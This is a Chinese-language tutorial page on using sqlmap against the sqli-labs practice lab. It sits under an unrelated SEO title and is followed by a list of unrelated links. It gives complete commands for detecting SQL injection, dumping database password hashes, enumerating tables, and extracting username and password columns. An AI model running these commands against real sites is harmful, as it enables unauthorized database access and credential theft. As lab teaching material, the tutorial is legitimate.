当前位置: 首页 > news >正文

请简述网站建设的一般流程图wordpress中视频分集

请简述网站建设的一般流程图,wordpress中视频分集,网站中英文转换js,罗湖网站建设哪家好本文用的是kali自带的sqlmap工具 我们通过常用命令来理解sqlmap的基本使用 目录 检测注入 获取敏感信息 获取表 获取表的字段 获取数据 --technique 使用指定的注入方式 使用基于时间的延时注入 支持多种注入检测 默认是全部 注入时使用随机的 HTTP User-Agent 设置超时时间 读…

本文用的是kali自带的sqlmap工具

我们通过常用命令来理解sqlmap的基本使用


目录

检测注入

获取敏感信息

获取表

获取表的字段

获取数据

--technique 使用指定的注入方式

使用基于时间的延时注入

 支持多种注入检测 默认是全部

注入时使用随机的 HTTP User-Agent

设置超时时间

读取文本进行SQL注入检测


检测注入

sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" -dbms mysql -v 1 -batch

-u                       检测的url

""                        双引号 表示这是一段字符串

-dbms                指定攻击的数据引擎

-batch        会自动进行默认操作,不用进行交互信息 确定 

-v                       输出信息登记为1        输出信息详细程度级别:0-6(默认为 1)

0:只显示Python回源(tracebacks),错误(error)和关键(criticle)信息。

1:同时显示信息(info)和警告信息(warning)(默认为1)

2: 同时显示调试信息(debug)

3:同时显示注入的有效载荷(payloads)

4:同时显示http请求

5:同时显示http响应头

6:同时显示http响应内容

级别越高,信息就越详细,根据需求选择合适的输出信息。


获取敏感信息

sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql --current-user --current-db --is-dba --passwords -v 1 -batch

--current-user                 用户连接的用户

--currnet-db                    当前库

--is-dba                          是否root权限

--passwords                   获取数据库的密码 使用这个命令 sqlmap找到密文时,会提示你是否进行hash破解 如果需要选择合适的字典。


获取表

sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security --tables

在获取当前库、可以根据库列出表。

-D                         指定库

--tables                 列出所有表


获取表的字段

sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security -T users --columns

获取某个表的所有字段

-T                                         指定某个表

--columns                             获取字段


获取数据

sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security -T users -C "username,password" --dump

--dump                         是导出数据所有内容

-C                                "username,password" 获取字段的内容


--technique 使用指定的注入方式

--technique 参数的值的解释

B:Boolean-basedblindSQLinjection(布尔型注入)

E:Error-basedSQLinjection(报错型注入)

U:UNIONquerySQLinjection(可联合查询注入)

S:StackedqueriesSQLinjection(可多语句查询注入)

T:Time-basedblindSQLinjection(基于时间延迟注入)

Q:InlineSQLInjection(内联注入)

使用基于时间的延时注入

sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 3 -D security --technique=T

 支持多种注入检测 默认是全部

sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 3 -D security --technique=BEUT

注入时使用随机的 HTTP User-Agent

sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 3 -D security --random-agent

设置超时时间

--time-out 这个参数是设置超时时间 有得网页响应比较慢,可以使用这个参数来增大访问超时的时间。默认是30

sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 3 -D security --timeout=10

读取文本进行SQL注入检测

sqlmap -r post.txt --batch
POST /sqllabs/Less-11/ HTTP/1.1
Host: 192.168.164.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://192.168.164.1
Connection: close
Referer: http://192.168.164.1/sqllabs/Less-11/
Upgrade-Insecure-Requests: 1uname=1&passwd=1&submit=Submit

http://www.yayakq.cn/news/71516/

相关文章:

  • 做最好的色书网站网站rss怎么做
  • 建设网站请示推广公司简介
  • 南宁的网站建设健身网站开发过程中遇到的麻烦
  • 快速搭建一个网站无锡电子商城网站建设
  • 网页设计网站建设招聘手机网站 微信链接怎么做
  • 怎么做一淘宝客网站吗济南网站的优化
  • 网站后台账号密码破解做招商类型的网站
  • 深圳高端网站定制公司河北省建设厅网站备案
  • 昆明好的网站开发公司百度网站优化软件
  • 换友链的网站域名污染查询网站
  • 主机如何做服务器建网站产品展示网站含后台网站模板下载
  • 网站后台口令统一门户网站建设参考规范
  • 黄岛区做网站的wordpress主题mip
  • 简述如何对网站进行推广?双鸭山住房和城乡建设局网站
  • 深圳福田网站建设公司哪家好佛山市锵美装饰有限公司网站建设案例
  • code网站免费北京手机软件开发公司
  • 桥东区网站建设南网站建设 首选搜点网络
  • 物联网网站开发专门做玉的网站
  • 学做热干面网站成都广告公司排行
  • 网站运营专员是干嘛的网站开发框架 c
  • 网站优化搜索建设网站的建设费用包括什么
  • 青岛创世网络网站建设西乡做网站
  • 网站后台 ftp垣宝建设工程集团网站
  • python 建设网站怎么买域名自己做网站
  • 免费推广网站有哪些有哪些互联网公司营业执照经营范围
  • 品牌网站策划书新网站制作平台
  • html5 微网站旅游网站对比模板下载
  • 网站建设服务合同书中国建筑企业网
  • 南通哪里学网站建设简单大气静态网页模板
  • 请列举常见的网站推广方法如何在WordPress添加内容